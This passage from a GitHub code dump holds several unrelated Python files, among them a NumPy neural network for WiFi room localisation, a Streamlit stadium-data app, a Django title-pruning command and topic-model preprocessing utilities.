= testingNN(testLabelsOverall, predictedLabels)\n \n if (predictsFourthRoom):\n numberOfTestPoints = (trainingLabelsOverall.shape[0] - int(np.ceil(trainingLabelsOverall.shape[0] * 
partOfData))) * 0.2\n numberOfTestPointsTotal = numberOfTestPoints + numberOfTestPointsFourthRoom\n accuracy = accuracy * numberOfTestPoints / (numberOfTestPointsTotal) + accuracyFourthRoom * numberOfTestPointsFourthRoom / numberOfTestPointsTotal\n \n return accuracy, fiveFractile\n \n\ndef NNAgainstOtherDatasets(locations, filename, filenameTests, partOfData, bias, predictsFourthRoom, activationFunction, testNotARoom = False):\n\n trainingSamples, testSamplesOverall, trainingLabels, testLabelsOverall = getSamplesAndLabelsFromMultipleFiles(locations, filename, filenameTests, partOfData, testNotARoom)\n \n wh, bh, wo, bo, percentageSure, _ = bestModelNN(trainingSamples, trainingLabels, bias, activationFunction, numberOfClasses=len(locations))\n \n if (activationFunction == 'sigmoid'):\n fiveFractile = np.percentile(percentageSure, 5)\n else:\n fiveFractile = 1/3+np.finfo(float).eps\n \n predictedLabels, _ = getPredictedLabelsNN(testSamplesOverall, wh, bh, wo, bo, activationFunction, fiveFractile, predictsFourthRoom)\n \n accuracy = testingNN(testLabelsOverall, predictedLabels)\n \n if (predictsFourthRoom):\n accuracyFourthRoom, numberOfTestPointsFourthRoom = getAccuracyFourthRoomTestFile(locations, filename, filenameTests, partOfData, wh, bh, wo, bo, activationFunction, fiveFractile) \n if (partOfData == 1):\n numberOfTestPoints = int(np.floor(testLabelsOverall.shape[0] * 0.2))\n else:\n numberOfTestPoints = (testLabelsOverall.shape[0] - int(np.ceil(testLabelsOverall.shape[0] * partOfData))) * 0.2\n numberOfTestPointsTotal = numberOfTestPoints + numberOfTestPointsFourthRoom\n accuracy = accuracy * numberOfTestPoints / (numberOfTestPointsTotal) + accuracyFourthRoom * numberOfTestPointsFourthRoom / numberOfTestPointsTotal\n \n return accuracy, fiveFractile\n\n\ndef getAccuracyFourthRoom(locations, filename, partOfData, wh, bh, wo, bo, activationFunction, fiveFractile):\n distinctBSSID, _ = extractDistinctBSSIDAndNumberOfDataPoints(locations, filename)\n distinctBSSID, dataPoints = extractDistinctBSSIDAndNumberOfDataPoints([\"___\", \"___\", \"___\", \"___\", \"Entré\"], filename, distinctBSSID)\n samples, labels = extractData([\"___\", \"___\", \"___\", \"___\", \"Entré\"], filename, distinctBSSID, dataPoints)\n\n trainingSamples, _, trainingLabels, _ = randomSplitSamplesAndLabels(samples, labels, partOfData)\n \n predictedLabels, _ = getPredictedLabelsNN(trainingSamples, wh, bh, wo, bo, activationFunction, fiveFractile)\n accuracyFourthRoom = testingNN(trainingLabels, predictedLabels)\n \n numberOfTestPointsFourthRoom = int(np.floor(trainingLabels.shape[0] * 0.2))\n \n return accuracyFourthRoom, numberOfTestPointsFourthRoom\n\ndef getAccuracyFourthRoomTestFile(locations, filename, filenameTests, partOfData, wh, bh, wo, bo, activationFunction, fiveFractile):\n \n distinctBSSID, dataPoints = extractDistinctBSSIDAndNumberOfDataPoints(locations, filename)\n trainingSamples, trainingLabels = extractData(locations, filename, distinctBSSID, dataPoints)\n \n testSamplesOverall, testLabelsOverall = extractDataFromMultipleFiles([\"___\", \"___\", \"___\", \"Intet rum\", \"Entré\"], filenameTests, distinctBSSID)\n \n trainingSamples, _, trainingLabels, _ = randomSplitSamplesAndLabels(testSamplesOverall, testLabelsOverall, partOfData)\n \n predictedLabels, _ = getPredictedLabelsNN(trainingSamples, wh, bh, wo, bo, activationFunction, fiveFractile)\n accuracyFourthRoom = testingNN(trainingLabels, predictedLabels)\n \n numberOfTestPointsFourthRoom = int(np.floor(trainingLabels.shape[0] * 0.2))\n \n return 
accuracyFourthRoom, numberOfTestPointsFourthRoom\n\ndef bestModelNN(samples, labels, bias, activationFunction, numberOfClasses):\n bestAccuracy = float('-inf')\n bestwh = None\n bestbh = None\n bestwo = None\n bestbo = None\n bestPercentageSure = None\n \n samplesShuffled, labelsShuffled = shuffleMatrices(samples, labels)\n \n for i in range(1,6):\n trainingSamples, testSamples, trainingLabels, testLabels = deterministicSplitMatrix(samplesShuffled, labelsShuffled, 1/5, i)\n wh, bh, wo, bo = trainingModelNN(trainingSamples, trainingLabels, bias, activationFunction, numberOfClasses) \n \n predictedLabels, percentageSure = getPredictedLabelsNN(testSamples, wh, bh, wo, bo, activationFunction)\n accuracy = testingNN(testLabels, predictedLabels)\n \n if accuracy > bestAccuracy:\n bestAccuracy = accuracy\n bestwh = wh\n bestbh = bh\n bestwo = wo\n bestbo = bo\n bestPercentageSure = percentageSure\n \n return bestwh, bestbh, bestwo, bestbo, bestPercentageSure, bestAccuracy\n\n\ndef trainingModelNN(trainingSamples, labelsTrainingSamples, bias, activationFunction, numberOfClasses):\n one_hot_labels = np.zeros((len(labelsTrainingSamples), numberOfClasses))\n \n for i in range(len(labelsTrainingSamples)):\n one_hot_labels[i, labelsTrainingSamples[i].astype(int)] = 1\n\n attributes = trainingSamples.shape[1]\n hidden_nodes = 4\n output_labels = numberOfClasses\n\n np.random.seed(42)\n\n wh = np.random.randn(attributes, hidden_nodes)\n if bias:\n bh = np.random.randn(hidden_nodes)\n else:\n bh = np.zeros(hidden_nodes)\n\n wo = np.random.randn(hidden_nodes, output_labels)\n if bias:\n bo = np.random.randn(output_labels)\n else:\n bo = np.zeros(output_labels)\n\n lr = 0.001\n\n error_cost = []\n wh_list = []\n wo_list = []\n bh_list = []\n bo_list = []\n\n for epoch in range(5000):\n # feedforward\n zh = np.dot(trainingSamples, wh) + bh\n if (activationFunction == 'sigmoid'):\n ah = sigmoid(zh)\n else:\n ah = zh \n zo = np.dot(ah, wo) + bo\n ao = softmax(zo)\n\n # backpropagation\n dcost_dzo = ao - one_hot_labels\n dzo_dwo = ah\n dcost_wo = np.dot(dzo_dwo.T, dcost_dzo)\n\n if (bias):\n dcost_bo = dcost_dzo\n \n dzo_dah = wo\n dcost_dah = np.dot(dcost_dzo , dzo_dah.T)\n dzh_dwh = trainingSamples\n \n if (activationFunction == 'sigmoid'):\n dah_dzh = sigmoid_der(zh)\n dcost_wh = np.dot(dzh_dwh.T, dah_dzh * dcost_dah)\n else:\n dah_dzh = np.ones_like(zh) \n dcost_wh = np.dot(dzh_dwh.T, dah_dzh * dcost_dah)\n \n if (bias):\n dcost_bh = dcost_dah * dah_dzh\n\n # update weights\n wh -= lr * dcost_wh\n wo -= lr * dcost_wo\n if bias:\n bh -= lr * dcost_bh.sum(axis=0)\n bo -= lr * dcost_bo.sum(axis=0)\n\n # store weights\n if epoch % 200 == 0:\n loss = -np.sum(one_hot_labels * np.log(ao))\n error_cost.append(loss)\n wh_list.append(wh.copy())\n wo_list.append(wo.copy())\n bh_list.append(bh.copy())\n bo_list.append(bo.copy())\n\n # select the best weights based on the lowest error cost\n i = np.argmin(error_cost)\n\n return wh_list[i], bh_list[i], wo_list[i], bo_list[i]\n\ndef getPredictedLabelsNN(testSamples, wh, bh, wo, bo, activationFunction, fiveFractile = 0, predictsFourthRoom = False):\n predictedLabels = []\n percentageSure = []\n\n zh = np.dot(testSamples, wh) + bh\n if (activationFunction == \"sigmoid\"):\n ah = sigmoid(zh)\n else:\n ah = zh\n\n z0 = np.dot(ah, wo) + bo\n ah = softmax(z0)\n\n for i in range(len(ah)):\n maxPercentage = np.max(ah[i])\n if (maxPercentage < fiveFractile):\n if (predictsFourthRoom):\n predictedLabels.append(4) #Change to 3 if you want to test not a room\n else: 
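# confidence (max softmax output) is below the fiveFractile threshold\n # and no fourth room is modelled, so fall back to label 3 (not a room)\n 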
predictedLabels.append(3)\n else:\n predictedLabels.append(np.argmax(ah[i]))\n percentageSure.append(maxPercentage)\n\n return predictedLabels, percentageSure\n \n \ndef softmax(A):\n A -= np.max(A, axis=1, keepdims=True)\n expA = np.exp(A)\n return expA / np.sum(expA, axis=1, keepdims=True)\n\ndef sigmoid(x):\n x = 1/(1+np.exp(-x))\n return x\n \ndef sigmoid_der(x):\n return sigmoid(x) *(1-sigmoid (x))\n\ndef testingNN(labelsTestSamples, predictedLabels):\n correct = 0\n \n for i in range(0, len(labelsTestSamples)):\n if labelsTestSamples[i] == predictedLabels[i]:\n correct += 1\n \n accuracy = correct/len(labelsTestSamples)\n \n return accuracy","repo_name":"moestergaard/DataBehandling","sub_path":"DataAnalysis/NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":10281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"90878086","text":"import os\n\nclass item:\n def get_total(self,item_name,rate,qty):\n self.item_name=item_name\n self.rate=rate\n self.qty=qty\n self.total= rate*qty\n \n def display(self):\n print('%20s %20d %20d %20d' %(self.item_name, self.rate, self.qty, self.total))\n return None\n\ndef main():\n item1=item()\n \n print(\"\")\n i_name=input(\"enter item name:--\")\n i_rate=input(\"enter item rate:--\")\n i_qty=input(\"enter item quantity:--\")\n\n print('%20s %20s %20s %20s' %('item_name','rate','qty','total'))\n item1.get_total(i_name,int(i_rate),int(i_qty))\n\n \n item1.display()\n\nif __name__=='__main__':\n main()\n\n","repo_name":"rajesh-priyadarshi/python-scripts","sub_path":"item_by_using_class_with_input.py","file_name":"item_by_using_class_with_input.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38898625767","text":"import json\nimport sys\nfrom dataclasses import dataclass\nfrom itertools import zip_longest\nfrom typing import List\n\nresult_folder_name = sys.argv[1]\n\n\n@dataclass\nclass Tgt:\n name: str\n te_name: str\n chrom: str\n pos: int\n\n\n# list of SX-4 insertions within a natural TE,\n# found through inverse PCR (taken from Google Sheet)\ntargets: List[Tgt] = [\n Tgt(\"SX4Ch7\", \"1360\", \"2L\", 12_004_570),\n Tgt(\"SX4Aq839\", \"1360\", \"2L\", 16_727_570),\n Tgt(\"SX4Lv807\", \"invader1\", \"2R\", 6_622_465),\n Tgt(\"SX4Et51\", \"copia\", \"2R\", 9_237_984),\n Tgt(\"SX4Et8\", \"HMS-Beagle\", \"2R\", 15_951_007),\n Tgt(\"SX4Et49\", \"opus\", \"3L\", 17_918_916),\n Tgt(\"SX4Lv831\", \"Juan\", \"3R\", 4_411_749),\n Tgt(\"SX4Lv816\", \"1360\", \"3R\", 4_610_657),\n Tgt(\"SX4Lv811\", \"F-element\", \"3R\", 4_753_706),\n Tgt(\"SX4Co882\", \"mdg3\", \"3R\", 5_073_316),\n Tgt(\"SX4ECPS11\", \"invader4\", \"3R\", 16_189_617),\n]\n\n# number of bp on each side of the insertion that we allow the transposon to be\ncutoff = 1_000\n\n\n@dataclass\nclass SplitReadRanges:\n te_range: List[int]\n genome_range: List[int]\n\n\n@dataclass\nclass Result:\n ref: bool\n name: str\n chrom: str\n upstream_pos: int\n downstream_pos: int\n orientation: str\n upstream_reads: List[SplitReadRanges]\n downstream_reads: List[SplitReadRanges]\n\n\nwith open(\n f\"output/te_mapper/{result_folder_name}/te_mapper_output.json\", \"r\"\n) as in_file:\n raw = json.load(in_file)\n results = []\n for chrom in raw:\n for result in chrom[\"non_reference\"]:\n results.append(Result(False, **result))\n for result in chrom[\"reference\"]:\n results.append(Result(True, **result))\n for 
result in results:\n result.upstream_reads = [SplitReadRanges(**x) for x in result.upstream_reads]\n result.downstream_reads = [\n SplitReadRanges(**x) for x in result.downstream_reads\n ]\n\n\ndef candidate(tgt: Tgt, res: Result) -> bool:\n \"\"\"Is the result a candidate to be the target?\"\"\"\n\n # check that it is the same transposon\n if not res.name.startswith(tgt.te_name):\n return False\n\n # check that it is on the same chromosome\n if res.chrom != tgt.chrom:\n return False\n\n # check the position\n if res.ref:\n return tgt.pos in range(res.upstream_pos, res.downstream_pos + 1)\n else:\n return (\n abs(res.upstream_pos - tgt.pos) <= cutoff\n or abs(res.downstream_pos - tgt.pos) <= cutoff\n )\n\n\nfiltered: List[tuple] = [] # (tgt, result) pairs\nfor tgt in targets:\n tentative = [result for result in results if candidate(tgt, result)]\n if len(tentative) > 1:\n raise RuntimeError(\n f\"tentative insertion list has more than 1 element (target: {tgt})\"\n )\n elif len(tentative) == 1:\n filtered.append((tgt, tentative[0]))\n\nwith open(\n f\"output/te_mapper/{result_folder_name}/split_reads_for_tgt.csv\", \"w\"\n) as out_file:\n out_file.write(\n \"Name,\"\n \"TE Name,\"\n \"Chromosome,\"\n \"Upstream Position,\"\n \"Downstream Position,\"\n \"Orientation,\"\n \"Reference?,\"\n \"Upstream Reads (TE Range),,\"\n \"Upstream Reads (Genome Range),,\"\n \"Downstream Reads (TE Range),,\"\n \"Downstream Reads (Genome Range),\\n\"\n )\n for tgt, result in filtered:\n out_file.write(\n f\"{tgt.name},\"\n f\"{result.name},\"\n f\"{result.chrom},\"\n f\"{result.upstream_pos},\"\n f\"{result.downstream_pos},\"\n f\"{'+/+' if result.orientation == 'PlusPlus' else '+/-'},\"\n f\"{'reference' if result.ref else 'non-reference'},\"\n \",,,,,,,\\n\"\n )\n results = zip_longest(result.upstream_reads, result.downstream_reads)\n for upstream, downstream in results:\n out_file.write(\",,,,,,,\")\n if upstream is None:\n out_file.write(\",,,,\")\n else:\n out_file.write(\n f\"{upstream.te_range[0]},{upstream.te_range[1]},{upstream.genome_range[0]},{upstream.genome_range[1]},\"\n )\n if downstream is None:\n out_file.write(\",,,\\n\")\n else:\n out_file.write(\n f\"{downstream.te_range[0]},{downstream.te_range[1]},{downstream.genome_range[0]},{downstream.genome_range[1]}\\n\"\n )\n","repo_name":"sanath-2024/stan_x_paper_prep","sub_path":"scripts/get_table1_split_reads.py","file_name":"get_table1_split_reads.py","file_ext":"py","file_size_in_byte":4344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"14181899798","text":"import streamlit\r\nimport streamlit as st\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport re\r\n\r\n#Name: Luis Quispe Tasayco\r\n#CS230: Section 3\r\n#Data: stadiums-geocoded\r\n\r\n#Description:\r\n#The program I have created will display information about each stadium and how stadiums are located and related by their division,\r\n#capacity, and state. 
It will also let you filter out stadiums to find the most convenient one to attend.\r\n#(In order for the program to work correctly you must have the data on the pages file and the final project file)\r\ndf = pd.read_csv(\"stadiums-geocoded.csv\") #decided not to add index_col\r\ndef remove_char(string):\r\n return re.sub(r'[^a-zA-Z0-9\\s]', '', string) #removes any character that isn't a letter, digit, or space by replacing it with an empty string\r\n\r\n\r\ndf['stadium'] = df['stadium'].apply(remove_char) #apply function\r\ndf['team'] = df['team'].apply(remove_char)\r\n#dictionary w all acronyms\r\nstatesdic = {\r\n \"Alabama\": \"AL\",\r\n \"Alaska\": \"AK\",\r\n \"Arizona\": \"AZ\",\r\n \"Arkansas\": \"AR\",\r\n \"California\": \"CA\",\r\n \"Colorado\": \"CO\",\r\n \"Connecticut\": \"CT\",\r\n \"Delaware\": \"DE\",\r\n \"Florida\": \"FL\",\r\n \"Georgia\": \"GA\",\r\n \"Hawaii\": \"HI\",\r\n \"Idaho\": \"ID\",\r\n \"Illinois\": \"IL\",\r\n \"Indiana\": \"IN\",\r\n \"Iowa\": \"IA\",\r\n \"Kansas\": \"KS\",\r\n \"Kentucky\": \"KY\",\r\n \"Louisiana\": \"LA\",\r\n \"Maine\": \"ME\",\r\n \"Maryland\": \"MD\",\r\n \"Massachusetts\": \"MA\",\r\n \"Michigan\": \"MI\",\r\n \"Minnesota\": \"MN\",\r\n \"Mississippi\": \"MS\",\r\n \"Missouri\": \"MO\",\r\n \"Montana\": \"MT\",\r\n \"Nebraska\": \"NE\",\r\n \"Nevada\": \"NV\",\r\n \"New Hampshire\": \"NH\",\r\n \"New Jersey\": \"NJ\",\r\n \"New Mexico\": \"NM\",\r\n \"New York\": \"NY\",\r\n \"North Carolina\": \"NC\",\r\n \"North Dakota\": \"ND\",\r\n \"Ohio\": \"OH\",\r\n \"Oklahoma\": \"OK\",\r\n \"Oregon\": \"OR\",\r\n \"Pennsylvania\": \"PA\",\r\n \"Rhode Island\": \"RI\",\r\n \"South Carolina\": \"SC\",\r\n \"South Dakota\": \"SD\",\r\n \"Tennessee\": \"TN\",\r\n \"Texas\": \"TX\",\r\n \"Utah\": \"UT\",\r\n \"Vermont\": \"VT\",\r\n \"Virginia\": \"VA\",\r\n \"Washington\": \"WA\",\r\n \"Washington D.C.\": \"DC\",\r\n \"West Virginia\": \"WV\",\r\n \"Wisconsin\": \"WI\",\r\n \"Wyoming\": \"WY\"\r\n}\r\n\r\n#change all states to acronyms, also get D.C. to work\r\ndef state_prob(state):\r\n state = state.strip()\r\n state = state.replace('.','')\r\n if len(state) == 2:\r\n return state\r\n else:\r\n try:\r\n return statesdic[state]\r\n except KeyError:\r\n return 'N/A'\r\ndf['state'] = df['state'].apply(state_prob) #changing states\r\n\r\n#function to get expanded column clear with no issues\r\ndef yearfunc(yr):\r\n if pd.isnull(yr):\r\n return np.nan\r\n elif len(yr) >= 4:\r\n return yr[:4]\r\n else:\r\n return np.nan\r\n\r\ndf['expanded'] = df['expanded'].apply(yearfunc)\r\n\r\n#Finished clearing all errors in data\r\n\r\n#Website section\r\nst.set_page_config(\r\n page_title=\"homepage\"\r\n) #Names the website\r\n\r\nst.title(\"Stadium's data analysis\")\r\nst.subheader(\"CS230.3\")\r\nst.write(\"Welcome to my Data Analysis website. My name is Luis Quispe, and the topic of this website is stadiums, which you can explore through interactive graphs and maps.\")\r\nst.write(\"This website is designed to help you better understand each stadium located in the United States and compare stadiums by size, division, and conference.\")\r\nst.write(\"Any feedback is greatly appreciated. If you have any, please make sure to leave your feedback in the comment section, which I check on a daily basis and will use to implement new content or suggestions.\")
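\r\n\r\n#Note: the \"Submit Feedback\" handler below appends each entry to a local\r\n#file named \"feedback\" (no extension), so submissions persist between runs.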
\r\n\r\n\r\nfeedback = st.text_input(\"Please leave feedback here: \")\r\nif st.button(\"Submit Feedback\"):\r\n with open(\"feedback\", \"a\") as f:\r\n f.write(feedback + \"\\n\")\r\n st.write(\"Thank you! I will read it soon\")\r\n\r\n\r\n\r\n\r\n\r\n#References:\r\n#https://stackoverflow.com/ #just used this link since I used stackoverflow in more than 2 scenarios\r\n#https://gist.github.com/rogerallen/1583593\r\n#https://www.youtube.com/watch?v=YClmpnpszq8\r\n#https://realpython.com/\r\n#Streamlitmap\r\n#https://discuss.streamlit.io/ #Used more than twice\r\n\r\n","repo_name":"luisff112/Stadium-Analytics","sub_path":"Homepage.py","file_name":"Homepage.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"12726432345","text":"from django.core.management.base import BaseCommand\nfrom lstv_api_v1.models import *\nfrom alive_progress import alive_bar\n\nfrom lstv_api_v1.tasks.tasks import job_process_ip_to_geo\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n\n\n forbidden = ['na', 'test',\n 'teaser', 'cinematography', 'loose leaf weddings', 'promo video', 'wedding video may 2020',\n 'highlight reel 2020', '2019 brides', 'milan photo cine art', 'cinematic', '2019 review',\n 'reel0.1', 'wedding video april 2019']\n\n with alive_bar(Video.objects.count(), \"- pruning video browse tab titles for accuracy\", length=10,\n bar=\"blocks\") as bar:\n for video in Video.objects.all():\n venue = video.businesses.filter(business_role_type__slug='venue').values_list('business__name',\n flat=True).first()\n if not venue:\n print(video.post.slug + \" -> \" + \" no venue\")\n video.state = ContentModelState.suspended_review\n video.save()\n\n if not video.location or not video.post.properties.filter(\n key='spouse_1').first() or video.properties.filter(\n key='spouse_2').first():\n if not video.post.properties.filter(key='spouse_1').first() or not video.properties.filter(\n key='spouse_2').first():\n video.state = ContentModelState.suspended_review\n couple = video.title.split('|')[0].split(\"+\")\n if len(couple) == 2 and couple[0].strip().lower() not in forbidden and couple[\n 1].strip().lower() not in forbidden and not couple[0].strip().isnumeric() and not couple[\n 1].strip().isnumeric() and not (couple[0].strip().lower() == couple[1].strip().lower()):\n print(f\"{video.post.slug} -> no couples - fixable: --> {couple[0]} + {couple[1]}\")\n video.state = ContentModelState.active\n\n s1 = Properties(key='spouse_1', value_text=couple[0].title())\n s1.save()\n video.post.properties.add(s1)\n s2 = Properties(key='spouse_2', value_text=couple[1].title())\n s2.save()\n video.post.properties.add(s2)\n\n if len(couple[0]) < 2 or len(couple[1]) < 2:\n video.state = ContentModelState.active_review\n video.save()\n\n if video.state in [ContentModelState.active, ContentModelState.active_review]:\n venue = video.businesses.filter(business_role_type__slug='venue').values_list('business__name',\n flat=True).first()\n video.title = f\"{video.post.properties.filter(key='spouse_1').first().value_text} + \" \\\n f\"{video.post.properties.filter(key='spouse_2').first().value_text} | {str(video.location)} | \" \\\n f\"{venue}\"\n video.save()\n bar()\n\n with alive_bar(Video.objects.count(), \"- checking titles\", 
length=10,\n bar=\"blocks\") as bar:\n for video in Video.objects.all():\n s = video.title.split('|')\n\n if len(s) < 1 or len(s[0].strip()) < 1 or len(s[0].split(\"+\")) < 2:\n print(f\"{video.post.slug} -> no couple names\")\n if len(s) < 2 or len(s[1].strip()) < 3:\n print(f\"{video.post.slug} -> no location -> {video.title} -> {s[1].strip()}\")\n\n if len(s) < 3 or len(s[2].strip()) < 1:\n print(f\"{video.post.slug} -> no venue\")\n bar()\n\n print(f\"total: {Video.objects.count()}\")\n","repo_name":"Stevenpijei/wedding-site","sub_path":"lstv_be/lstv_api_v1/management/commands/job_prune_post_titles.py","file_name":"job_prune_post_titles.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74627875111","text":"import json\n\nf = open(\"bibleallverses.json\", \"r\")\njson_data = json.load(f)\nbible = json_data[\"bible\"]\nverses = []\nfor item in bible:\n #print(item)\n verse = [item[\"book\"], item[\"chapter\"], item[\"verse\"]]\n verses.append(verse)\nprint(len(verses))\nwith open(\"references.json\", \"w\") as outfile:\n json.dump(verses, outfile)","repo_name":"gesab001/BooksBibleViewGalaxyWatch","sub_path":"reference_generator.py","file_name":"reference_generator.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7504249176","text":"\"\"\"\n1. input = [[1,2,5],[5,2,1],[0,9,6]]\noutput = [[1,5,0],[2,2,9],[5,1,6]]\n\"\"\"\ninput = [[1, 2, 5], [5, 2, 1], [0, 9, 6]]\nn = 0\nresult = []\nfor item in input:\n result.append([x[n] for x in input])\n n += 1\n\nprint(result)\n\n\"\"\"\n2. input: dct_list = ['abc', 'cab', 'abcd', 'dcba', 'abcde']\noutput : {3: ['abc', 'cab'], 4: ['abcd', 'dcba'], 5: ['abcde']}\n\"\"\"\nmy_dict = {}\ndct_list = ['abc', 'cab', 'abcd', 'dcba', 'abcde']\nfor item in dct_list:\n if len(item) not in my_dict:\n my_dict[len(item)] = list([item])\n else:\n my_dict[len(item)].append(item)\n\nprint(my_dict)\n\n\"\"\"\n3.my_str = \"My name is supriya M\"\noutput = \"Ma yirp us siemany M\"\n\"\"\"\nmy_str = \"My name is supriya M\"\n\n\ndef reverse_str(my_str):\n my_list = my_str.split(\" \")\n list2 = []\n n = 0\n rev_str = \"\"\n for item in my_str:\n if item != \" \":\n rev_str = rev_str + item\n rev_str = rev_str[::-1]\n for item in my_list:\n list2.append(rev_str[n:n + len(item)])\n n += len(item)\n return \" \".join(list2)\n\n\nprint(\"the reverse string is ---> {}\".format(reverse_str(my_str)))\n","repo_name":"supriya-mainalli/PythonNotes","sub_path":"interview_questions/global_logic.py","file_name":"global_logic.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10890905290","text":"import numpy\nimport os\nimport linecache\nimport math\n\n__author__ = 'Bryce Woodworth'\n\ndef _mapper(word):\n \"\"\"Takes a word and maps it to the lowercase equivalent\n with punctuation removed.\"\"\"\n punctuation = ',.!?~#()[]-+='\n return word.strip(punctuation).lower()\n\n\ndef stop_remover(filenames, stopwords, outdir):\n \"\"\"Removes the given stop words from the given files,\n as well as punctuation and capitalization,\n and saves the result in the given directory.\n\n Inputs:\n filenames: A list of paths to files to be cleaned\n stopwords: A list of words to be removed\n outdir: The directory to save the cleaned files in\n\n Returns: nothing\n \"\"\"\n for filename in 
filenames:\n cleaned = \"\"\n with open(filename) as file:\n try:\n for line in file:\n line = map(_mapper, line.split())\n line = filter(lambda w: w not in stopwords, line)\n cleaned += (' '.join(line) + '\\n')\n except UnicodeDecodeError:\n print(filename)\n continue\n\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n with open(os.path.join(outdir, os.path.basename(filename)), 'w') as outfile:\n outfile.write(cleaned)\n\n\ndef find_most_common(filenames, num_words, ignore=[]):\n \"\"\"Finds the n most common words in the given files\n and returns them as a list, ignoring words in the\n ignore list.\n\n Inputs:\n filenames: A list of paths to files to be searched through\n num_words: The number of most common words to find\n ignore: A list of words that should not be considered\n\n Returns: A list of the num_words most common words in filenames\n \"\"\"\n freqs = {}\n for filename in filenames:\n with open(filename) as file:\n try:\n for line in file:\n for word in line.split():\n if word in ignore:\n continue\n if word in freqs:\n freqs[word] += 1\n else:\n freqs[word] = 1\n except UnicodeDecodeError:\n print(filename)\n continue\n\n sort = sorted(freqs.items(), key=lambda x: x[1])[-num_words:]\n sort.reverse()\n return [word for (word, _) in sort]\n\n\ndef word_filter(filenames, vocab, outdir):\n \"\"\"Removes all words that aren't in the vocab\n from filenames and places the modified files in outdir.\n\n Inputs:\n filenames: A list of paths to files to be pruned\n vocab: The vocabulary to prune the files to\n outdir: The path to place the modified files in, using their original names\n\n Returns: void\n \"\"\"\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n for filename in filenames:\n pruned = \"\"\n with open(filename) as file:\n try:\n for line in file:\n line = ' '.join(filter(lambda w: w in vocab, line.split()))\n pruned += line + '\\n'\n except UnicodeDecodeError:\n continue\n\n with open(os.path.join(outdir, os.path.basename(filename)), 'w') as outfile:\n outfile.write(pruned)\n\n\ndef word_bag_reduce(filename, vocname, dictname, size, stopwords=None):\n \"\"\"Treats the input file as a bag of words (formatting specific)\n and outputs its co-occurrence matrix Q, using a vocab\n size of size by removing the least common words overall, and\n optionally removing stopwords from the specified file.\n\n Inputs:\n filename: A path to the bag of words file\n vocname: A path to the indexed vocabulary file\n dictname: A path to a dictionary to filter words by\n size: The number of words to keep\n stopwords: The path to a file containing whitespace-separated stop words,\n or None if no stop words\n\n Returns:\n Q: The word-word co-occurrence matrix\n vocab: The list of words indexed by their Q index\n \"\"\"\n # First get the indices of the stop words, if any\n stops = []\n stop_indices = []\n stop_set = set()\n if stopwords is not None:\n with open(stopwords) as stopfile:\n for line in stopfile:\n stops.extend(line.split())\n\n # Convert from string stopwords to dictionary index stopwords\n with open(vocname) as vocfile:\n lineindex = 1\n for line in vocfile:\n if line.strip() in stops:\n stop_indices.append(lineindex)\n lineindex += 1\n stop_set = set(stop_indices)\n\n # Get the total word counts into a dictionary\n counts = dict()\n with open(filename) as file:\n num_docs = int(file.readline())\n cur_vocab = int(file.readline())\n file.readline()\n\n for line in file:\n split = line.split()\n # only count words whose vocab index is not a stop word (split[1]\n # is a word index, so compare against stop_set, not the raw words)\n if int(split[1]) not in stop_set:\n 
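# accumulate the corpus-wide count for this word id (a string index\n # into the vocab file); the first occurrence raises KeyError below\n 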
try:\n counts[split[1]] += int(split[2])\n except KeyError:\n counts[split[1]] = int(split[2])\n\n # Next get all of the dictionary words from dictname\n dictionary = []\n with open(dictname) as dictfile:\n for line in dictfile:\n dictionary.append(line.strip())\n\n # Now use that dictionary to find the most common words\n sort = list(filter(lambda w: linecache.getline(vocname, int(w)).strip() in dictionary, sorted(counts, key=lambda x: counts[x], reverse=True)))\n\n # Get the mapping from sorted index to string\n vocab = list(map(lambda x: linecache.getline(vocname, int(x)).strip(), sort[:size]))\n\n with open(filename) as file:\n file.readline()\n file.readline()\n file.readline()\n\n H = numpy.zeros((size, num_docs)) # The term-by-document matrix\n for line in file:\n split = line.split()\n try:\n ind = sort.index(split[1])\n except ValueError:\n continue\n if ind < size:\n H[ind][int(split[0])-1] += int(split[2])\n\n # recover the word-word co-occurrence matrix Q\n Q = construct_Q(H)\n\n priors = [0.0] * Q.shape[0]\n\n for i in range(len(priors)):\n priors[i] = numpy.sum(Q[i])\n priors = priors / sum(priors)\n\n Qbar = numpy.empty_like(Q)\n for row in range(Q.shape[0]):\n total = numpy.sum(Q[row])\n if total <= 0.0:\n print(\"invalid sum of %d at row %d\" % (total, row))\n Qbar[row] = Q[row] / total\n\n return vocab, priors, Qbar, H\n\n\ndef construct_Q(H):\n \"\"\"\n Constructs the Q matrix from the word-document counts H\n\n :param H: the word-document counts, size V x K\n :return: Q: The estimated word-word co-occurence matrix\n \"\"\"\n Hbar = numpy.empty_like(H)\n Hhat = numpy.zeros((H.shape[0], H.shape[0]))\n n = numpy.sum(H, axis=0)\n\n for col in range(H.shape[1]):\n denom = n[col] * (n[col] - 1)\n if denom <= 0.0:\n print(\"Invalid denominator of %d at column %d. 
